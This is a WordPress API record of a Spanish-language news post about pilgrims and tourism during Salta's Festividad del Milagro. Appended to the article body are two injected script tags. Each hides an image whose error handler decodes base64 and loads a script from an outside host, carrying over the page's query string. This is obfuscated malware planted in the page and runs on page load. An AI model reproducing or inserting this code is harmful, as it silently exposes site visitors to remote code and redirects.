{"id":1495,"date":"2022-09-16T12:05:37","date_gmt":"2022-09-16T15:05:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1495"},"modified":"2025-08-14T00:35:14","modified_gmt":"2025-08-14T03:35:14","slug":"el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1495","title":{"rendered":"El Milagro de Salta se vivi\u00f3 con miles de turistas en peregrinaciones y la procesi\u00f3n"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#aa062f\"><em>El 13, 14 y 15 de septiembre en Salta es tiempo de fe y miles de turistas llegan desde varios puntos del pa\u00eds para vivir unas jornadas \u00fanicas. La tasa neta de ocupaci\u00f3n promedi\u00f3 el 70%.<\/em><\/h4>\n\n\n\n<p>En el pa\u00eds, Salta es sin\u00f3nimo de fe con eventos con varios eventos que se realizan durante el a\u00f1o que congrega a fieles y peregrinos, entre los que se destaca la Festividad del Milagro que trasciende las fronteras de la provincia y re\u00fane a miles de turistas de la Argentina y de pa\u00edses de la regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4119-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4119-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\" alt=\"El Milagro de Salta se vivi\u00f3 con miles de turistas en peregrinaciones y la procesi\u00f3n\"\/><\/a><\/figure>\n\n\n\n<p>El Ministerio de Turismo y Deportes destac\u00f3 el buen nivel de ocupaci\u00f3n en los d\u00edas del milagro a pesar de que en el resto del pa\u00eds fueron d\u00edas laborables, promediando entre el 13 y 15 de septiembre una tasa neta de ocupaci\u00f3n que promedi\u00f3 el 70%, con un impacto econ\u00f3mico de $356.849.429.<\/p>\n\n\n\n<p>Si bien el epicentro de la festividad es la ciudad de Salta, produce un derrame en los principales destinos tur\u00edsticos que durante los pr\u00f3ximos d\u00edas esperan visitantes que vivir\u00e1n experiencias diversas con la mejor gastronom\u00eda y cultura.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1496\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\" alt=\"\" class=\"wp-image-1496\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/4121-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Al margen de estos d\u00edas especiales vinculados a una festividad religiosas, destinos de los valles Calchaqu\u00edes y del Valle de Lerma registraron altas tasas de ocupaci\u00f3n producto de turistas salte\u00f1os que aprovecharon las jornadas no laborables y de extranjeros y nacionales que por otras circunstancias eligieron a Salta como destino.<\/p>\n\n\n\n<p>Salta es una de las provincias con m\u00e1s alto grado de religiosidad, con un circuito \u00fanico de iglesias, tanto en la ciudad de Salta como en el interior, muchas de ellas monumentos hist\u00f3ricos, adem\u00e1s las fiestas patronales son motivo de movilidad de turistas y fieles.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4122-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4122-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\" alt=\"El Milagro de Salta se vivi\u00f3 con miles de turistas en peregrinaciones y la procesi\u00f3n\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4123-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4123-el-milagro-de-salta-se-vivio-con-miles-de-turistas-en-peregrinaciones-y-la-procesion.jpg\" alt=\"El Milagro de Salta se vivi\u00f3 con miles de turistas en peregrinaciones y la procesi\u00f3n\"\/><\/a><\/figure>\n\n\n\n<p>Durante estos d\u00edas se recuerda la intercesi\u00f3n milagrosa de la Virgen y la protecci\u00f3n del Santo Cristo Crucificado durante los temblores que azotaron la regi\u00f3n en 1692. Desde entonces, cada a\u00f1o los fieles renuevan su pacto de fidelidad y piden la protecci\u00f3n de los Patronos a sus hogares. Entre los eventos m\u00e1s destacables, son los miles y miles de peregrinos, que a pie, a caballo o en bicicleta recorren cientos de kil\u00f3metros y durante d\u00edas como muestra de fe y agradecimiento.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 13, 14 y 15 de septiembre en Salta es tiempo de fe y miles de turistas llegan desde varios puntos del pa\u00eds para vivir unas jornadas \u00fanicas. La tasa neta de ocupaci\u00f3n promedi\u00f3 el 70%. En el pa\u00eds, Salta es sin\u00f3nimo de fe con eventos con varios eventos que se realizan durante el a\u00f1o [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1497,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[2],"tags":[],"class_list":{"0":"post-1495","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-religiosos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1495"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1495"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1495\/revisions"}],"predecessor-version":[{"id":7347,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1495\/revisions\/7347"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1497"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}